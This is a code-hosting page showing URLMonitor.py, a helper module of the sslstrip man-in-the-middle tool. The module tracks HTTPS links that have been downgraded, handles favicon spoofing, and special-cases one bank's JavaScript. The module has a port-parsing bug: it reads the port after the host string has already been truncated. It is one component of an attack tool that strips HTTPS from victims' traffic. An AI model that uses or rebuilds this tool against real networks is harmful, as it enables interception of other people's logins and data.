Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
nu11secur1ty
GitHub Repository: nu11secur1ty/Kali-Linux
 Path: blob/master/sslstrip-work-2019/sslstrip/URLMonitor.py
1306 views
1
# Copyright (c) 2004-2009 Moxie Marlinspike

2
#

3
# This program is free software; you can redistribute it and/or

4
# modify it under the terms of the GNU General Public License as

5
# published by the Free Software Foundation; either version 3 of the

6
# License, or (at your option) any later version.

7
#

8
# This program is distributed in the hope that it will be useful, but

9
# WITHOUT ANY WARRANTY; without even the implied warranty of

10
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU

11
# General Public License for more details.

12
#

13
# You should have received a copy of the GNU General Public License

14
# along with this program; if not, write to the Free Software

15
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307

16
# USA

17
#

18


19
import re

20


21
class URLMonitor:    

22


23
    '''

24
    The URL monitor maintains a set of (client, url) tuples that correspond to requests which the

25
    server is expecting over SSL.  It also keeps track of secure favicon urls.

26
    '''

27


28
    # Start the arms race, and end up here...

29
    javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")]

30
    _instance          = None

31


32
    def __init__(self):

33
        self.strippedURLs       = set()

34
        self.strippedURLPorts   = {}

35
        self.faviconReplacement = False

36


37
    def isSecureLink(self, client, url):

38
        for expression in URLMonitor.javascriptTrickery:

39
            if (re.match(expression, url)):

40
                return True

41


42
        return (client,url) in self.strippedURLs

43


44
    def getSecurePort(self, client, url):

45
        if (client,url) in self.strippedURLs:

46
            return self.strippedURLPorts[(client,url)]

47
        else:

48
            return 443

49


50
    def addSecureLink(self, client, url):

51
        methodIndex = url.find("//") + 2

52
        method      = url[0:methodIndex]

53


54
        pathIndex   = url.find("/", methodIndex)

55
        host        = url[methodIndex:pathIndex]

56
        path        = url[pathIndex:]

57


58
        port        = 443

59
        portIndex   = host.find(":")

60


61
        if (portIndex != -1):

62
            host = host[0:portIndex]

63
            port = host[portIndex+1:]

64
            if len(port) == 0:

65
                port = 443

66
        

67
        url = method + host + path

68


69
        self.strippedURLs.add((client, url))

70
        self.strippedURLPorts[(client, url)] = int(port)

71


72
    def setFaviconSpoofing(self, faviconSpoofing):

73
        self.faviconSpoofing = faviconSpoofing

74


75
    def isFaviconSpoofing(self):

76
        return self.faviconSpoofing

77


78
    def isSecureFavicon(self, client, url):

79
        return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1))

80


81
    def getInstance():

82
        if URLMonitor._instance == None:

83
            URLMonitor._instance = URLMonitor()

84


85
        return URLMonitor._instance

86


87
    getInstance = staticmethod(getInstance)

88


89